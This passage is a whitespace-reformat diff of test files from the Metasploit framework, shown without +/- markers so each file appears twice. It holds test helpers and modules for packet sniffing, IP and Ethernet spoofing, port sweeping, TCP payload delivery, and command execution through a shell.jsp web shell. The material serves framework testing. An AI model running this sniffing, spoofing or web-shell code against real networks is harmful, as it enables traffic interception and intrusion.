@@idx_reported[caller[0].to_s] = true
end
slice(*args)
end
end
test/lib/module_test.rb
+49 -49
View File
@@ -3,66 +3,66 @@
module Msf
module ModuleTest
attr_accessor :tests
attr_accessor :failures
attr_accessor :tests
attr_accessor :failures
def initialize(info={})
@tests = 0
@failures = 0
super
end
def initialize(info={})
@tests = 0
@failures = 0
super
end
def run_all_tests
tests = self.methods.select { |m| m.to_s =~ /^test_/ }
tests.each { |test_method|
self.send(test_method)
}
def run_all_tests
tests = self.methods.select { |m| m.to_s =~ /^test_/ }
tests.each { |test_method|
self.send(test_method)
}
end
end
def it(msg="", &block)
@tests += 1
begin
result = block.call
unless result
print_error("FAILED: #{msg}")
print_error("FAILED: #{error}") if error
@failures += 1
return
end
rescue ::Exception => e
print_error("FAILED: #{msg}")
print_error("Exception: #{e.class} : #{e}")
dlog("Exception in testing - #{msg}")
dlog("Call stack: #{e.backtrace.join("\n")}")
return
end
def it(msg="", &block)
@tests += 1
begin
result = block.call
unless result
print_error("FAILED: #{msg}")
print_error("FAILED: #{error}") if error
@failures += 1
return
end
rescue ::Exception => e
print_error("FAILED: #{msg}")
print_error("Exception: #{e.class} : #{e}")
dlog("Exception in testing - #{msg}")
dlog("Call stack: #{e.backtrace.join("\n")}")
return
end
print_good("#{msg}")
end
print_good("#{msg}")
end
def pending(msg="", &block)
print_status("PENDING: #{msg}")
end
def pending(msg="", &block)
print_status("PENDING: #{msg}")
end
end
module ModuleTest::PostTest
include ModuleTest
def run
print_status("Running against session #{datastore["SESSION"]}")
print_status("Session type is #{session.type} and platform is #{session.platform}")
include ModuleTest
def run
print_status("Running against session #{datastore["SESSION"]}")
print_status("Session type is #{session.type} and platform is #{session.platform}")
t = Time.now
@tests = 0; @failures = 0
run_all_tests
t = Time.now
@tests = 0; @failures = 0
run_all_tests
vprint_status("Testing complete in #{Time.now - t}")
if (@failures > 0)
print_error("Passed: #{@tests - @failures}; Failed: #{@failures}")
else
print_status("Passed: #{@tests - @failures}; Failed: #{@failures}")
end
end
vprint_status("Testing complete in #{Time.now - t}")
if (@failures > 0)
print_error("Passed: #{@tests - @failures}; Failed: #{@failures}")
else
print_status("Passed: #{@tests - @failures}; Failed: #{@failures}")
end
end
end
end
test/lib/msf_matchers.rb
+67 -67
View File
@@ -5,90 +5,90 @@ module MsfTest
module MsfMatchers
class ContainACompleteTest
class ContainACompleteTest
def initialize()
@r = Regexr.new(true)
end
def initialize()
@r = Regexr.new(true)
end
def matches?(data)
@data = data
return @r.verify_start_and_end(@data,"meterpreter_functional_test_start", "meterpreter_functional_test_end")
end
def matches?(data)
@data = data
return @r.verify_start_and_end(@data,"meterpreter_functional_test_start", "meterpreter_functional_test_end")
end
def failure_message
"Beginning or end was incorrect."
end
def failure_message
"Beginning or end was incorrect."
end
def negative_failure_message
"Expected to find a no beginning or end, but it matched."
end
def negative_failure_message
"Expected to find a no beginning or end, but it matched."
end
end
def contain_a_complete_test
ContainACompleteTest.new
end
end
def contain_a_complete_test
ContainACompleteTest.new
end
class ContainAllSuccesses
class ContainAllSuccesses
def initialize(successes=[])
@successes = successes
@r = Regexr.new(true)
end
def initialize(successes=[])
@successes = successes
@r = Regexr.new(true)
end
def matches?(data)
@data = data
@string = @r.find_strings_that_dont_exist_in_data(@data,@successes)
return true if !@string
nil
end
def matches?(data)
@data = data
@string = @r.find_strings_that_dont_exist_in_data(@data,@successes)
return true if !@string
nil
end
def failure_message
"expected all successes, but didn't find '#{@string}'"
end
def failure_message
"expected all successes, but didn't find '#{@string}'"
end
def negative_failure_message
"expected to miss successes but found'm all :("
end
def negative_failure_message
"expected to miss successes but found'm all :("
end
#alias :have_all_successes :contain_all_successes
end
def contain_all_successes(successes=[])
ContainAllSuccesses.new(successes)
end
class ContainNoFailuresExcept
#alias :have_all_successes :contain_all_successes
end
def contain_all_successes(successes=[])
ContainAllSuccesses.new(successes)
end
class ContainNoFailuresExcept
def initialize(failures=[],exceptions=[])
@failures = failures
@exceptions = exceptions
@r = Regexr.new(true)
end
def initialize(failures=[],exceptions=[])
@failures = failures
@exceptions = exceptions
@r = Regexr.new(true)
end
def matches?(data)
@data = data
@string = @r.find_strings_that_exist_in_data_except(@data,@failures,@exceptions)
return true if !@string
nil
end
def matches?(data)
@data = data
@string = @r.find_strings_that_exist_in_data_except(@data,@failures,@exceptions)
return true if !@string
nil
end
def failure_message
"expected no failure to be found, but found this: '#{@string}'"
end
def failure_message
"expected no failure to be found, but found this: '#{@string}'"
end
def negative_falure_message
"expected to find failures, but didn't find any :("
end
def negative_falure_message
"expected to find failures, but didn't find any :("
end
#alias :have_no_failures :contain_no_failures
end
#alias :have_no_failures :contain_no_failures
end
def contain_no_failures_except(failures=[],exceptions=[])
ContainNoFailuresExcept.new(failures,exceptions)
end
def contain_no_failures_except(failures=[],exceptions=[])
ContainNoFailuresExcept.new(failures,exceptions)
end
end
end
test/lib/regexr.rb
+83 -83
View File
@@ -6,101 +6,101 @@
class Regexr
def initialize(verbose=false, case_insensitive=true)
@verbose = verbose
@case_insensitive = case_insensitive
end
def initialize(verbose=false, case_insensitive=true)
@verbose = verbose
@case_insensitive = case_insensitive
end
# Check for the beginning and end lines. Handy when you need to ensure a log has started & completed
def verify_start_and_end(data,the_start,the_end)
return false unless data
data_lines = data.split("\n")
regex_start = Regexp.new(the_start, @case_insensitive)
regex_end = Regexp.new(the_end, @case_insensitive)
# Check for the beginning and end lines. Handy when you need to ensure a log has started & completed
def verify_start_and_end(data,the_start,the_end)
return false unless data
data_lines = data.split("\n")
regex_start = Regexp.new(the_start, @case_insensitive)
regex_end = Regexp.new(the_end, @case_insensitive)
if regex_start =~ data_lines.first
return regex_end =~ data_lines.last
end
return false
end
if regex_start =~ data_lines.first
return regex_end =~ data_lines.last
end
return false
end
# Scan for any number of success lines. In order to pass, all successes must match.
def find_strings_that_dont_exist_in_data(data,regexes=[])
return false unless data
# Scan for any number of success lines. In order to pass, all successes must match.
def find_strings_that_dont_exist_in_data(data,regexes=[])
return false unless data
data_lines = data.split("\n")
return nil unless regexes ## count as a pass
if regexes
target_successes = regexes.size
success_count = 0
regexes.each { |condition|
data_lines = data.split("\n")
return nil unless regexes ## count as a pass
if regexes
target_successes = regexes.size
success_count = 0
regexes.each { |condition|
## assume we haven't got it
found = false
re = Regexp.new(condition, @case_insensitive)
## for each of our data lines
data_lines.each {|line|
## if it's a match
if line =~ re
found = true
break ## success!
end
}
if !found
return condition ## return this string, it wasn't found.
end
}
end
nil ## got all successes, woot!
end
## assume we haven't got it
found = false
re = Regexp.new(condition, @case_insensitive)
## for each of our data lines
data_lines.each {|line|
## if it's a match
if line =~ re
found = true
break ## success!
end
}
if !found
return condition ## return this string, it wasn't found.
end
}
end
nil ## got all successes, woot!
end
# Scan for failures -- if any single failure matches, the test returns true.
def find_strings_that_exist_in_data_except(data,regexes=[],exceptions=[])
# Scan for failures -- if any single failure matches, the test returns true.
def find_strings_that_exist_in_data_except(data,regexes=[],exceptions=[])
return false unless data
return false unless data
data_lines = data.split("\n")
return nil unless regexes ## count as a pass
data_lines = data.split("\n")
return nil unless regexes ## count as a pass
regexes.each { |condition|
regexes.each { |condition|
## for each failure condition that we've been passed
re = Regexp.new(condition, @case_insensitive)
## for each failure condition that we've been passed
re = Regexp.new(condition, @case_insensitive)
## assume we're okay
found = false
## assume we're okay
found = false
data_lines.each { |line|
if re =~ line
found = true # oh, we found a match
# but let's check the exceptions
exceptions.map { |exception|
reg_exception = Regexp.new(exception, @case_insensitive)
data_lines.each { |line|
if re =~ line
found = true # oh, we found a match
# but let's check the exceptions
exceptions.map { |exception|
reg_exception = Regexp.new(exception, @case_insensitive)
# If the exception matches here, we'll spare it
if reg_exception =~ line
found = false
break
end
}
# If the exception matches here, we'll spare it
if reg_exception =~ line
found = false
break
end
}
# If we didn't find an exception, we have to fail it. do not pass go.
return condition if found
end
}
}
nil ## no failures found!
end
# If we didn't find an exception, we have to fail it. do not pass go.
return condition if found
end
}
}
nil ## no failures found!
end
end
test/modules/auxiliary/test/capture.rb
+38 -38
View File
@@ -15,49 +15,49 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Capture
include Msf::Auxiliary::Report
include Msf::Exploit::Capture
def initialize
super(
'Name' => 'Simple Network Capture Tester',
'Version' => '$Revision$',
'Description' => 'This module sniffs HTTP GET requests from the network',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Sniffer' ]
],
'PassiveActions' =>
[
'Sniffer'
],
'DefaultAction' => 'Sniffer'
)
def initialize
super(
'Name' => 'Simple Network Capture Tester',
'Version' => '$Revision$',
'Description' => 'This module sniffs HTTP GET requests from the network',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Sniffer' ]
],
'PassiveActions' =>
[
'Sniffer'
],
'DefaultAction' => 'Sniffer'
)
deregister_options('RHOST')
end
deregister_options('RHOST')
end
def run
print_status("Opening the network interface...")
open_pcap()
def run
print_status("Opening the network interface...")
open_pcap()
print_status("Sniffing HTTP requests...")
each_packet() do |pkt|
p = PacketFu::Packet.parse(pkt)
next unless p.is_tcp?
next if p.payload.empty?
if (p.payload =~ /GET\s+([^\s]+)\s+HTTP/smi)
url = $1
print_status("GET #{url}")
break if url =~ /StopCapture/
end
print_status("Sniffing HTTP requests...")
each_packet() do |pkt|
p = PacketFu::Packet.parse(pkt)
next unless p.is_tcp?
next if p.payload.empty?
if (p.payload =~ /GET\s+([^\s]+)\s+HTTP/smi)
url = $1
print_status("GET #{url}")
break if url =~ /StopCapture/
end
end
close_pcap()
print_status("Finished sniffing")
end
end
close_pcap()
print_status("Finished sniffing")
end
end
test/modules/auxiliary/test/check.rb
+30 -30
View File
@@ -9,39 +9,39 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => "Check Test",
'Description' => %q{
This module ensures that 'check' actually functions for Auxiilary modules.
},
'References' =>
[
[ 'OSVDB', '0' ]
],
'Author' =>
[
'todb'
],
'License' => MSF_LICENSE
))
def initialize(info = {})
super(update_info(info,
'Name' => "Check Test",
'Description' => %q{
This module ensures that 'check' actually functions for Auxiilary modules.
},
'References' =>
[
[ 'OSVDB', '0' ]
],
'Author' =>
[
'todb'
],
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(80)
], self.class)
end
register_options(
[
Opt::RPORT(80)
], self.class)
end
def check
print_debug "Check is successful"
return Msf::Exploit::CheckCode::Vulnerable
end
def check
print_debug "Check is successful"
return Msf::Exploit::CheckCode::Vulnerable
end
def run
print_debug "Run is successful."
end
def run
print_debug "Run is successful."
end
end
test/modules/auxiliary/test/eth_spoof.rb
+34 -34
View File
@@ -15,43 +15,43 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Capture
include Msf::Auxiliary::Report
include Msf::Exploit::Capture
def initialize
super(
'Name' => 'Simple Ethernet Frame Spoofer',
'Version' => '$Revision$',
'Description' => 'This module sends spoofed ethernet frames',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Spoofer' ]
],
'DefaultAction' => 'Spoofer'
)
end
def initialize
super(
'Name' => 'Simple Ethernet Frame Spoofer',
'Version' => '$Revision$',
'Description' => 'This module sends spoofed ethernet frames',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Spoofer' ]
],
'DefaultAction' => 'Spoofer'
)
end
def run
print_status("Opening the network interface...")
open_pcap()
def run
print_status("Opening the network interface...")
open_pcap()
p = PacketFu::UDPPacket.new
p.eth_saddr = "00:41:41:41:41:41"
p.eth_daddr = "00:42:42:42:42:42"
p.ip_saddr = "41.41.41.41"
p.ip_daddr = "42.42.42.42"
p.udp_sport = 0x41
p.udp_dport = 0x42
p.payload = "SPOOOOOFED"
p.recalc
1.upto(10) do
capture.inject(p.to_s)
end
p = PacketFu::UDPPacket.new
p.eth_saddr = "00:41:41:41:41:41"
p.eth_daddr = "00:42:42:42:42:42"
p.ip_saddr = "41.41.41.41"
p.ip_daddr = "42.42.42.42"
p.udp_sport = 0x41
p.udp_dport = 0x42
p.payload = "SPOOOOOFED"
p.recalc
1.upto(10) do
capture.inject(p.to_s)
end
close_pcap()
print_status("Finished sending")
end
close_pcap()
print_status("Finished sending")
end
end
test/modules/auxiliary/test/ftp_data.rb
+60 -60
View File
@@ -13,82 +13,82 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::Remote::Ftp
def initialize
super(
'Name' => 'FTP Client Exploit Mixin DATA test Exploit',
'Version' => '$Revision$',
'Description' => 'This module tests the "DATA" functionality of the ftp client exploit mixin.',
'Author' => [ 'Thomas Ring', 'jduck' ],
'License' => MSF_LICENSE
)
def initialize
super(
'Name' => 'FTP Client Exploit Mixin DATA test Exploit',
'Version' => '$Revision$',
'Description' => 'This module tests the "DATA" functionality of the ftp client exploit mixin.',
'Author' => [ 'Thomas Ring', 'jduck' ],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('UPLOADDIR', [ true, "The directory to use for the upload test", '/incoming' ])
]
)
end
register_options(
[
OptString.new('UPLOADDIR', [ true, "The directory to use for the upload test", '/incoming' ])
]
)
end
def run
def run
begin
if (not connect_login)
return
end
begin
if (not connect_login)
return
end
curdir = ""
curdir = ""
# change to the upload directory
result = send_cmd( ["CWD", datastore['UPLOADDIR']], true )
print_status("CWD response: #{result.inspect}")
# change to the upload directory
result = send_cmd( ["CWD", datastore['UPLOADDIR']], true )
print_status("CWD response: #{result.inspect}")
# find out what the server thinks this dir is
result = send_cmd( ["PWD"], true )
print_status("PWD response: #{result.inspect}")
if (result =~ /257\s\"(.+)\"/)
curdir = $1
end
curdir = "/" + curdir if curdir[0] != "/"
curdir << "/" if curdir[-1,1] != "/"
# find out what the server thinks this dir is
result = send_cmd( ["PWD"], true )
print_status("PWD response: #{result.inspect}")
if (result =~ /257\s\"(.+)\"/)
curdir = $1
end
curdir = "/" + curdir if curdir[0] != "/"
curdir << "/" if curdir[-1,1] != "/"
# generate some data to upload
data = Rex::Text.rand_text_alphanumeric(1024)
#print_status("data:\n" + Rex::Text.to_hex_dump(data))
# generate some data to upload
data = Rex::Text.rand_text_alphanumeric(1024)
#print_status("data:\n" + Rex::Text.to_hex_dump(data))
# test putting data
result = send_cmd_data(["PUT", curdir+"test"], data, "I")
print_status("PUT response: #{result.inspect}")
# test putting data
result = send_cmd_data(["PUT", curdir+"test"], data, "I")
print_status("PUT response: #{result.inspect}")
# test fallthrough
result = send_cmd_data(["HELP"], true)
print_status("HELP response: #{result.inspect}")
# test fallthrough
result = send_cmd_data(["HELP"], true)
print_status("HELP response: #{result.inspect}")
# test listing directory
result = send_cmd_data(["LS", curdir], "A")
print_status("LS response: #{result.inspect}")
# test listing directory
result = send_cmd_data(["LS", curdir], "A")
print_status("LS response: #{result.inspect}")
# test getting file
result = send_cmd_data(["GET", curdir+"test"], "A")
print_status("GET response: #{result[0].inspect}")
# test getting file
result = send_cmd_data(["GET", curdir+"test"], "A")
print_status("GET response: #{result[0].inspect}")
# see if it matches
if (result[1] != data)
print_error("Data doesn't match!")
else
print_good("Data downloaded matches what we uploaded!")
end
# see if it matches
if (result[1] != data)
print_error("Data doesn't match!")
else
print_good("Data downloaded matches what we uploaded!")
end
# adios
result = send_cmd( ["QUIT"], true )
print_status("QUIT response: #{result.inspect}")
# adios
result = send_cmd( ["QUIT"], true )
print_status("QUIT response: #{result.inspect}")
ensure
disconnect
end
ensure
disconnect
end
end
end
end
test/modules/auxiliary/test/ip_spoof.rb
+44 -44
View File
@@ -14,56 +14,56 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Auxiliary::Scanner
include Msf::Exploit::Capture
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Simple IP Spoofing Tester',
'Version' => '$Revision$',
'Description' => 'Simple IP Spoofing Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
def initialize
super(
'Name' => 'Simple IP Spoofing Tester',
'Version' => '$Revision$',
'Description' => 'Simple IP Spoofing Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
begin
require 'pcaprub'
@@havepcap = true
rescue ::LoadError
@@havepcap = false
end
begin
require 'pcaprub'
@@havepcap = true
rescue ::LoadError
@@havepcap = false
end
deregister_options('FILTER','PCAPFILE')
deregister_options('FILTER','PCAPFILE')
end
end
def run_host(ip)
open_pcap
p = PacketFu::UDPPacket.new
p.ip_saddr = ip
p.ip_daddr = ip
p.ip_ttl = 255
p.udp_sport = 53
p.udp_dport = 53
p.payload = "HELLO WORLD"
p.recalc
ret = send(ip,p)
if ret == :done
print_good("#{ip}: Sent a packet to #{ip} from #{ip}")
else
print_error("#{ip}: Packet not sent. Check permissions & interface.")
end
close_pcap
end
def run_host(ip)
open_pcap
p = PacketFu::UDPPacket.new
p.ip_saddr = ip
p.ip_daddr = ip
p.ip_ttl = 255
p.udp_sport = 53
p.udp_dport = 53
p.payload = "HELLO WORLD"
p.recalc
ret = send(ip,p)
if ret == :done
print_good("#{ip}: Sent a packet to #{ip} from #{ip}")
else
print_error("#{ip}: Packet not sent. Check permissions & interface.")
end
close_pcap
end
def send(ip,pkt)
begin
capture_sendto(pkt, ip)
rescue RuntimeError => e
return :error
end
return :done
end
def send(ip,pkt)
begin
capture_sendto(pkt, ip)
rescue RuntimeError => e
return :error
end
return :done
end
end
test/modules/auxiliary/test/recon_passive.rb
+55 -55
View File
@@ -15,66 +15,66 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::Tcp
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Actions' =>
[
['Continuous Port Sweep']
],
'PassiveActions' =>
[
'Continuous Port Sweep'
]
)
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Actions' =>
[
['Continuous Port Sweep']
],
'PassiveActions' =>
[
'Continuous Port Sweep'
]
)
register_options(
[
Opt::RHOST,
Opt::RPORT,
], self.class)
register_options(
[
Opt::RHOST,
Opt::RPORT,
], self.class)
end
end
def run
print_status("Running the simple recon module with action #{action.name}")
def run
print_status("Running the simple recon module with action #{action.name}")
case action.name
when 'Continuous Port Sweep'
while (true)
1.upto(65535) do |port|
datastore['RPORT'] = port
prober()
end
end
end
end
case action.name
when 'Continuous Port Sweep'
while (true)
1.upto(65535) do |port|
datastore['RPORT'] = port
prober()
end
end
end
end
def prober
begin
connect
disconnect
report_host(:host => datastore['RHOST'])
report_service(
:host => datastore['RHOST'],
:port => datastore['RPORT'],
:proto => 'tcp'
)
rescue ::Exception => e
case e.to_s
when /connection was refused/
report_host(:host => datastore['RHOST'])
else
print_status(e.to_s)
end
end
end
def prober
begin
connect
disconnect
report_host(:host => datastore['RHOST'])
report_service(
:host => datastore['RHOST'],
:port => datastore['RPORT'],
:proto => 'tcp'
)
rescue ::Exception => e
case e.to_s
when /connection was refused/
report_host(:host => datastore['RHOST'])
else
print_status(e.to_s)
end
end
end
end
test/modules/auxiliary/test/scanner_batch.rb
+20 -20
View File
@@ -15,30 +15,30 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT,
], self.class)
register_options(
[
Opt::RPORT,
], self.class)
end
end
def run_batch_size
3
end
def run_batch_size
3
end
def run_batch(batch)
print_status("Working on batch #{batch.join(",")}")
end
def run_batch(batch)
print_status("Working on batch #{batch.join(",")}")
end
end
test/modules/auxiliary/test/scanner_host.rb
+17 -17
View File
@@ -15,26 +15,26 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT,
], self.class)
register_options(
[
Opt::RPORT,
], self.class)
end
end
def run_host(ip)
print_status("Working on host #{ip}")
end
def run_host(ip)
print_status("Working on host #{ip}")
end
end
test/modules/auxiliary/test/scanner_range.rb
+19 -19
View File
@@ -15,29 +15,29 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
def initialize
super(
'Name' => 'Simple Recon Module Tester',
'Version' => '$Revision$',
'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT,
], self.class)
register_options(
[
Opt::RPORT,
], self.class)
end
end
def run_range(range)
print_status("Working on range #{range}")
rw = Rex::Socket::RangeWalker.new(range)
print_status("RangeWalker: #{rw.inspect}")
end
def run_range(range)
print_status("Working on range #{range}")
rw = Rex::Socket::RangeWalker.new(range)
print_status("RangeWalker: #{rw.inspect}")
end
end
test/modules/auxiliary/test/space-check.rb
+6 -6
View File
@@ -9,14 +9,14 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => "Check Test",
'Description' => %q{
This module ensures that 'check' actually functions for Auxiilary modules.
super(update_info(info,
'Name' => "Check Test",
'Description' => %q{
This module ensures that 'check' actually functions for Auxiilary modules.
},
'References' =>
[
test/modules/exploits/test/aggressive.rb
+89 -89
View File
@@ -12,106 +12,106 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Aggressive Test Exploit',
'Description' =>
"This module tests the exploitation of a test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
# Target 0: Universal
[
'Any Platform',
{
'Platform' => [ 'linux', 'win' ]
}
],
[
'Test encoder specific',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'EncoderOptions' =>
{
'BufferRegister' => 'EBX',
'BufferOffset' => 4
}
}
},
],
[
'Cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
],
[ 'Test context encoder',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'BadChars' => "\x00"
}
}
]
],
'DefaultTarget' => 0))
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Aggressive Test Exploit',
'Description' =>
"This module tests the exploitation of a test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
# Target 0: Universal
[
'Any Platform',
{
'Platform' => [ 'linux', 'win' ]
}
],
[
'Test encoder specific',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'EncoderOptions' =>
{
'BufferRegister' => 'EBX',
'BufferOffset' => 4
}
}
},
],
[
'Cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
],
[ 'Test context encoder',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'BadChars' => "\x00"
}
}
]
],
'DefaultTarget' => 0))
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
])
end
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
])
end
def autofilter
false
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
# Show disassembled payload for context encoder test
if target.name =~ /context encoder/
puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
end
def exploit
# Show disassembled payload for context encoder test
if target.name =~ /context encoder/
puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
end
connect
connect
print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")
print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")
sock.put(payload.encoded)
sock.put(payload.encoded)
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
handler
end
handler
end
end
test/modules/exploits/test/check.rb
+29 -29
View File
@@ -9,37 +9,37 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit
def initialize(info = {})
super(update_info(info,
'Name' => "Check Test Exploit",
'Description' => %q{
This module ensures that 'check' actually functions for Exploit modules.
},
'References' =>
[
[ 'OSVDB', '0' ]
],
'Author' =>
[
'todb'
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'May 23 2013'
))
def initialize(info = {})
super(update_info(info,
'Name' => "Check Test Exploit",
'Description' => %q{
This module ensures that 'check' actually functions for Exploit modules.
},
'References' =>
[
[ 'OSVDB', '0' ]
],
'Author' =>
[
'todb'
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'May 23 2013'
))
register_options(
[
Opt::RPORT(80)
], self.class)
end
register_options(
[
Opt::RPORT(80)
], self.class)
end
def check
print_debug "Check is successful"
return Msf::Exploit::CheckCode::Vulnerable
end
def check
print_debug "Check is successful"
return Msf::Exploit::CheckCode::Vulnerable
end
def exploit
print_debug "Exploit is successful."
end
def exploit
print_debug "Exploit is successful."
end
end
test/modules/exploits/test/cmdweb.rb
+59 -59
View File
@@ -12,75 +12,75 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
# =( need more targets and perhaps more OS specific return values OS specific would be preferred
Rank = ManualRanking
# =( need more targets and perhaps more OS specific return values OS specific would be preferred
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Stager Web Test',
'Description' => %q{
This module tests the command stager mixin against a shell.jsp application installed
on an Apache Tomcat server.
},
'Author' => 'bannedit',
'Version' => '$Revision$',
'References' =>
[
],
'DefaultOptions' =>
{
},
'Payload' =>
{
},
'Platform' => 'win',
'Privileged' => true,
'Targets' =>
[
# need more but this will likely cover most cases
[ 'Automatic Targeting',
{
'auto' => true
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 03 2010'))
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Stager Web Test',
'Description' => %q{
This module tests the command stager mixin against a shell.jsp application installed
on an Apache Tomcat server.
},
'Author' => 'bannedit',
'Version' => '$Revision$',
'References' =>
[
],
'DefaultOptions' =>
{
},
'Payload' =>
{
},
'Platform' => 'win',
'Privileged' => true,
'Targets' =>
[
# need more but this will likely cover most cases
[ 'Automatic Targeting',
{
'auto' => true
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 03 2010'))
register_options(
[
Opt::RPORT(8080),
], self.class)
end
register_options(
[
Opt::RPORT(8080),
], self.class)
end
def autofilter
false
end
def autofilter
false
end
# This is method required for the CmdStager to work...
def execute_command(cmd, opts)
uri = opts[:uri]
http_hash = {
'uri' => uri.gsub(/CMDS/, Rex::Text.uri_encode(cmd))
}
resp = send_request_raw(http_hash, 5)
end
# This is method required for the CmdStager to work...
def execute_command(cmd, opts)
uri = opts[:uri]
http_hash = {
'uri' => uri.gsub(/CMDS/, Rex::Text.uri_encode(cmd))
}
resp = send_request_raw(http_hash, 5)
end
def exploit
def exploit
opts = {
:delay => 0.5,
:uri => "/shell/shell.jsp?cmd=CMDS"
}
opts = {
:delay => 0.5,
:uri => "/shell/shell.jsp?cmd=CMDS"
}
execute_cmdstager(opts)
execute_cmdstager(opts)
handler
handler
end
end
end
test/modules/exploits/test/dialup.rb
+37 -37
View File
@@ -12,46 +12,46 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
